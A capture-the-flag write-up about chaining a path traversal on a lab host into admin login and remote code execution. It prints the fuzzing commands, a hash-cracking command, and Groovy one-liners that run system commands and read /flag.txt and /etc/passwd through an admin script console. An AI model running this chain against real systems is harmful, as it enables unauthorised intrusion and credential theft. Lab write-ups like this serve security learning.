Introduction

Bug bounty hunting is all about persistence and creativity. This write-up documents my approach to a CTF lab that simulates a real-world vulnerability, inspired by this $40,000 bounty write-up by Abdullah Nawaf and Orwa Atyat. In this challenge, I exploited a path traversal vulnerability to escalate to remote code execution (RCE) on ev3spph9.eu2.ctfio.com.

Reconnaissance & Discovery

Target: ev3spph9.eu2.ctfio.com

Tools Used:

• nmap for port scanning:

  nmap -p- ev3spph9.eu2.ctfio.com
  

• ffuf for directory fuzzing:

  ffuf -u http://ev3spph9.eu2.ctfio.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  

• gobuster for additional enumeration:

  gobuster dir -u https://ev3spph9.eu2.ctfio.com -w /usr/share/wordlists/dirb/common.txt
  

  Output:

  /admin                (Status: 302) [Size: 0] [--> /admin/faces/jsf/login.xhtml]
  

I found an admin panel at http://ev3spph9.eu2.ctfio.com/admin/faces/jsf/login.xhtml and a /download/ endpoint that hinted at file retrieval functionality.

Exploiting Path Traversal

Fuzzing revealed the vulnerable filename parameter:

wfuzz -c -z file,/usr/share/wordlists/common.txt --hh=404 "http://ev3spph9.eu2.ctfio.com/admin/download?filename=FUZZ"

This allowed me to read files like /WEB-INF/web.xml, revealing internal endpoints.

Credential Discovery & Admin Access

A log file at /admin/incident-report contained hashed credentials. Extracting and cracking them:

curl -O http://ev3spph9.eu2.ctfio.com/admin/incident-report
unzip incident-report-*.zip
cat incident.log

Extracted hashes were cracked using hashcat and Crackstation:

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Logging in as admin at /admin/faces/jsf/login.xhtml provided access to a script execution console (export_step2.xhtml).

Achieving RCE

The console allowed executing system commands:

I tried these:

println "id".execute().text
println "cat /flag.txt".execute().text

print "id".execute().text
print "cat /etc/passwd".execute().text

return ["id".execute().text, "cat /flag.txt".execute().text]

Since output wasn't directly displayed, I checked logs:

curl -O http://ev3spph9.eu2.ctfio.com:8443/admin/incident-report
unzip incident-report-*.zip
cat incident.log

Executing:

print "cat /flag.txt".execute().text

Successfully retrieved the flag!

Key Takeaways

1. Chaining bugs—a small vulnerability can lead to full compromise.

2. Check logs for output when commands don’t return results.

3. Persistence wins—keep testing different angles.

Conclusion

By combining multiple issues, I escalated from path traversal to RCE. This lab reinforced the importance of exploring beyond the initial vulnerability for maximum impact.